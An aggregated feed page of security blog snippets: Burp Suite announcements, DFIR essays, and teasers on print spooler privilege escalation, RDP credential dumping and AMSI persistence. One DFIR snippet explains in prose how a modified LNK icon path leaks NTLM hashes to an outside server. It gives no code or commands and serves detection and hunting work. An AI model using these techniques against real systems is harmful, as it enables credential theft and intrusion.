    The Print Spooler is responsible to manage and process printer jobs. It runs as a service with SYSTEM level privileges on windows environments. Abuse of… Continue reading → Universal Privilege Escalation and Persistence – Printer  ( 5 min )

  • Open

    Introducing the Burp Suite Certified Practitioner accreditation
    We launched the Web Security Academy in April 2019, as a means of providing free training and learning materials for security professionals. We now have 200 labs, and last year the Web Security Academ  ( 4 min )

  • Open

    Diversifying Cybersecurity Talent Through Aptitude Testing
    With a shortage of four million cybersecurity workers, we need to get more creative in identifying non-technical skills among potential candidates that can be applied to the cybersecurity realm. One way is to test them for aptitude and personality traits, like the career planning tests I took in college.That’s what the University of Maryland did […] The post Diversifying Cybersecurity Talent Through Aptitude Testing appeared first on Security Weekly.  ( 2 min )

  • Open

    Burp Suite roadmap update: July 2021
    Apparently we're halfway through 2021 already (where does the time go?). Here's an update on what we've added to our products so far this year, as well as some exciting new features we're adding to ou  ( 5 min )

  • Open

    Black Hat USA 2021: PortSwigger's latest research to be unveiled
    Two years ago, PortSwigger's director of research James Kettle presented "HTTP Desync Attacks" on-stage at BlackHat USA and kicked off a wave of request smuggling, but at that time HTTP/2 escaped seri  ( 4 min )

  • Open

    Introducing DOM Invader: DOM XSS just got a whole lot easier to find
    Of the three main types of XSS, DOM-based XSS is by far the most difficult to find and exploit. But we come bearing good news! PortSwigger just released a new tool for Burp Suite Professional and Burp  ( 7 min )
  • Open

    Preventing Criminals from Using Cloud Applications to Inject Chaos Into Work Environments
    In 2020, cyber criminals used cloud applications, the cover of a pandemic, and a newly embraced work-from-home culture to serve up ransomware, steal data, and disrupt how companies do business. The year is over, but the challenges and risks remain.  How do we prevent these criminals from injecting chaos into our hybrid work environments? As […] The post Preventing Criminals from Using Cloud Applications to Inject Chaos Into Work Environments appeared first on Security Weekly.  ( 2 min )

  • Open

    How the Best Defense Gets Better
    Security starts before detection and response, but many organizations focus there first. Mature security teams understand the importance of identification and protection.  Establishing good cyber hygiene and taking proactive measures to secure themselves against the ever-increasing threat landscape is a critical first step in a holistic security program.  How should organizations build a holistic security […] The post How the Best Defense Gets Better appeared first on Security Weekly.  ( 2 min )

  • Open

    What We Know About The Ransomware Economy
    Okay, I think that we can all admit that ransomware has consumed the news cycle of late, thanks to high visibility attacks such as Colonial Pipeline and JBS. Interestingly enough, there wasn't this sort of reaction the second time the City of Baltimore got attacked, which (IMHO) belies the news cycle more than anything else. However, while the focus is on ransomware, for the moment, it's a good time to point out that there's more to this than just the attacks that get blasted across news feeds. That is, ransomware itself is an economy, an eco-system, which is a moniker that goes a long way to toward describing why victims of these attacks are impacted to the extent that they are. What I mean by this is that everything...EVERYTHING...about what goes into a ransomware attack is directed at t…  ( 6 min )
    Thoughts on Assessing Threat Actor Intent & Sophistication
    I was reading this Splunk blog post recently, and I have to say up front, I was disappointed by the fact that the promise of the title (i.e., "Detecting Cl0p Ransomware") was not delivered on by the remaining content of the post. Very early on in the blog post is the statement: Ransomware is by nature a post-exploitation tool, so before deploying it they must infiltrate the victim's infrastructure.  Okay, so at this point, I'm looking for something juicy, some information regarding the TTPs used to "infiltrate the victim's infrastructure" and to locate files of interest for staging and exfil, but instead, the author(s) dove right into analyzing the malware itself, through reverse engineering. Early in that malware RE exercise is the statement: This ransomware has a defense evasion feature …  ( 5 min )

  • Open

    Making the Case for Supply Chain Behavior Transparency
    The Biden Administration’s Cyber Executive Order includes a Software Bill of Materials (SBOM), an electronically readable format designed to provide an inventory of third-party components that make up software components.  It is a critical and necessary first measure for protecting the software supply chain, but is it enough?One of the biggest challenges to supply chain transparency […] The post Making the Case for Supply Chain Behavior Transparency appeared first on Security Weekly.  ( 2 min )

  • Open

    Toolmarks: LNK Files in the news again
    As most regular readers of this blog can tell you, I'm a bit of a fan of LNK files...a LNK-o-phile, if you will. I'm not only fascinated by the richness of the structure, but as I began writing a parser for LNK files, I began too see some interesting aspects of intelligence that can be gleaned from LNK files, in particular, those created within a threat actors development environment, and deployed to targets/infrastructures. First, there are different ways to create LNK files using the Windows API, and what's really cool is that each method has it's own unique #toolmarks associated with it!   Second, most often there is a pretty good amount of metadata embedded in the LNK file structure. There are file system time stamps, and often we'll see a NetBIOS system name, a volume S/N, a SID, or o…  ( 5 min )
    Testing, and taking DFIR a step further
    One of Shakespeare's lines from Hamlet I remember from high school is, "...there are more things on heaven and earth, Horatio, than are dreamt of in your philosophy." And that's one of the great things about the #DFIR industry...there's always something new. I do not for a moment think that I've seen everything, and I, for one, find it fascinating when we find something that is either new, or that has been talked about but is being seen "in the wild" for the first time. Someone mentioned recently that Microsoft's Antimalware Scan Interface (i.e., AMSI) could be used for persistence, and that got me very interested.  This isn't something specifically or explicitly covered by the MTRE ATT&CK framework, and I wanted to dig into this a bit more to understand it. As it can be used for persisten…  ( 5 min )

  • Open

    20 Burp Suite tips from the Burp user community
    The Burp Suite user community can easily be described as passionate, dedicated, and highly invested in the development of our product. That's why we love it when our users take it upon themselves to q  ( 5 min )

  • Open

    Some of the best Burp extensions - as chosen by you
    As we mentioned in our recent blog post on good resources for new Burp Suite Professional users, the BApp Store is one of the largest repositories of community-created user content you're likely to fi  ( 3 min )

  • Open

    Dumping RDP Credentials
    Administrators typically use Remote Desktop Protocol (RDP) in order to manage Windows environments remotely. It is also typical RDP to be enabled in systems that… Continue reading → Dumping RDP Credentials  ( 5 min )

  • Open

    A few tips for the newcomers on this sub !
    This post is mainly intended to help the people who discover this sub to start with. It could also be useful for the other folks, who knows ? What is an open directory ? Open directories (aka ODs or opendirs) are just unprotected websites that you can browse recursively, without any required authentication. You can freely download individual files from them. They're organised in a folder structure, as a local directory tree on your computer. This is really convenient as you can also download several files in a bunch recursively (See below). These sites are sometimes deliberately let open and, sometimes, inadvertently (seedboxes, personal websites with some dirs bad protected, ...). For these last ones, often, after someone has posted them here, they're hammered by many concurrent downlo…  ( 8 min )

  • Open

    Great getting started resources for new users of Burp Suite Professional
    If you're new to Burp Suite Professional, then congratulations. Not only have you just bought into the world's leading toolkit for web security testing - you've also joined a massive worldwide communi  ( 5 min )

  • Open

    Persistence – AMSI
    AMSI (Antimalware Scan Interface) is a vendor agnostic interface which can communicate with the endpoint in order to prevent execution of malware. The scan performed… Continue reading → Persistence – AMSI  ( 5 min )

  • Open

    Experience Burp Suite Enterprise Edition in a new live demo
    Quick link: Burp Suite Enterprise Edition live demo. Deploying enterprise-grade software isn't always easy. We wanted a quick way for people to see the core features of Burp Suite Enterprise Edition w  ( 2 min )

  • Open

    Recorded logins in Burp Scanner
    If you’re using Burp Suite to test your website, it’s probably got some way for users to log in - and chances are it’s more complicated than filling in a username and password and hitting submit. Burp  ( 6 min )

  • Open

    On #DFIR Analysis, pt III - Benefits of a Structured Model
    In my previous post, I presented some of the basic design elements for a structured approach to describing artifact constellations, and leveraging them to further DFIR analysis. As much of this is new, I'm sure that this all sounds like a lot of work, and if you've read the other posts on this topic, you're probably wondering about the benefits to all this work. In this post, I'll take shot at netting out some of the more obvious benefits. Maintaining Corporate Knowledge Regardless of whether you're talking about an internal corporate position or a consulting role, analysts are going to see and learn new things based on their analysis. You're going to see new applications or techniques used, and perhaps even see the same threat actor making small changes to their TTPs due to some "stimulus…  ( 7 min )

  • Open

    On #DFIR Analysis, pt II - Describing Artifact Constellations
    I've been putting some serious thought into the topic of a new #DFIR model, and in an effort to extend and expand upon my previous post a bit, I wanted to take the opportunity to document and share some of my latest thoughts. I've discussed toolmarks and artifact constellations previously in this blog, and how they apply to attribution. In discussing a new #DFIR model, the question that arises is, how do we describe an artifact or toolmark constellation in a structured manner, so that it can be communicated and shared?   Of course, the next step after that, once we have a structured format for describing these constellations, is automating the sharing and "machine ingestion" of these constellation descriptions. But before we get ahead of ourselves, let's discuss a possible structure a bit …  ( 9 min )

  • Open

    AppSec experts share Burp Suite automation secrets and best practices
    Webinar recording: How to Perform Effective Web Application Security Assessments On 6 April, PortSwigger teamed up with HackerOne to bring you AppSec insights from industry expert Burp Suite users. Le  ( 3 min )

  • Open

    LNK Files, Again
    I ran across SharpWebServer via Twitter recently...the first line of the readme.md file states, "A Red Team oriented simple HTTP & WebDAV server written in C# with functionality to capture Net-NTLM hashes." I thought this was fascinating because it ties directly to a technique MITRE refers to as "Forced Authentication".  What this means is that a threat actor can (and has...we'll get to that shortly) modify Windows shortcut/LNK files such that the iconfilename field points to an external resource. What happens is that when LNK file is launched, Explorer will reach out to the external resource and attempt to authenticate, sending NTLM hashes across the wire.  As such, SharpWebServer is built to capture those hashes. What this means is that a threat actor can gain access to an infrastructure, and as has been observed, use various means to maintain persistence...drop backdoors or RATs, create accounts on Internet-facing systems, etc.  However, many (albeit not all) of these means of persistence can be overcome via the judicious use of AV, EDR monitoring, and a universal password change. Modifying the iconfilename field of an LNK file is a means of persisting beyond password changes, because even after passwords are change, the updated hashes will be sent across the wire. Now, I did say earlier that this has been used before, and it has.  CISA Alert TA18-074A includes a section named "Persistence through LNK file manipulation".  Note that from the alert, when looking at the "Contents of enu.cmd", "Persistence through LNK file manipulation", and "Registry Modification" sections, we can see a pretty comprehensive set of toolmarks associated with this threat actor.  This is excellent intrusion intelligence, and should be incorporated into any and all #DFIR parsing, enrichment and decoration, as well as threat hunting. However, things are even better! This tweet from bohops illustrates how to apply this technique to MSWord docs.  ( 4 min )
    On #DFIR Analysis
    I wanted to take the opportunity to discuss DFIR analysis; when discussing #DFIR analysis, we have to ask the question, "what _is_ "analysis"?" In most cases, what we call analysis is really just parsing some data source (or sources) and either viewing the output of the tools, or running keyword searches.  When this is the entire process, it is not analysis...it's running keyword searches. Don't get me wrong, there is nothing wrong with keyword searches, as they're a great way to orient yourself to the data and provide pivot points into further analysis.  However, these searches should not be considered the end of your analysis; rather, they are simply be beginning, or at least early stages of the analysis. The issue is that parsing data sources in isolation from each other and just runnin…  ( 10 min )

  • Open

    Simplified cloud deployment for Burp Suite Enterprise Edition
    Last year, we made Burp Suite Enterprise Edition cloud-friendly. Organizations migrating to the cloud, or taking a cloud-first approach, are able to deploy Burp Suite Enterprise Edition to AWS or Azur  ( 3 min )

  • Open

    PortSwigger teams up with HackerOne for AppSec workshop - 6 April
    Tuesday 6 April, 2021 | 10 AM PT / 1 PM ET / 6 PM GMT Update: this webinar can now be viewed on HackerOne's site, here. AppSec is a tricky business. While expertise remains scarce, threats are only ge  ( 3 min )

  • Open

    Extracting Toolmarks from Open Source Reporting, pt II
    On the heels of my previous post on this subject, I ran across this little gem from Microsoft regarding the print spooler EOP exploitation. I like articles like this because they illustrate threat actor activities outside the "norm", or what we usually tend to see in open reporting, if such things are illustrated in detail. Fig 4 (in step 1) in the article illustrates a new printer port being added to a Windows system as a step toward privilege escalation. This serves as one of the more-than-a-few interesting EDR-style tidbits from the article (i.e., detect the Powershell commandline), and also results in a fantastic toolmark that can be applied to DFIR "threat hunting".  The article illustrates, via fig 4, Powershell being used to add a printer port to the system, and that command results…  ( 5 min )
  • Open

    Improved CI/CD integrations in Burp Suite Enterprise Edition
    Burp Suite Enterprise Edition was designed to support your DevSecOps needs. One of the ways it does this is via our pre-built and generic CI/CD driver. This allows users to integrate with tooling of t  ( 4 min )

  • Open

    Browser powered scanning in Burp Suite
    Since the release of Browser powered scanning back in Burp Suite Professional 2020.8.1 we have had a lot of customers asking us about our motivation for choosing to integrate with Chromium and fo  ( 7 min )

  • Open

    API Scanning with Burp Suite
    Both Burp Suite Professional and Burp Suite Enterprise Edition contain Burp Scanner - allowing users to easily scan web applications for vulnerabilities. Other blog posts cover how Burp Scanner’s craw  ( 8 min )

  • Open

    Web application cartography: mapping out Burp Suite’s crawler
    At the core of Burp Suite is Burp Scanner - a powerful tool designed to reduce the number of manual steps users have to take to discover vulnerabilities in their targets. Burp Scanner was first releas  ( 16 min )

  • Open

    7 Burp Suite Professional-exclusive features to help you test smarter
    Welcome to the Pro user community So, you've downloaded Burp Suite Professional. What now? It's a big piece of software, and there's a lot of functionality you're probably not aware of - even if you'v  ( 7 min )
2022-02-21T01:06:41.429Z osmosfeed 1.14.4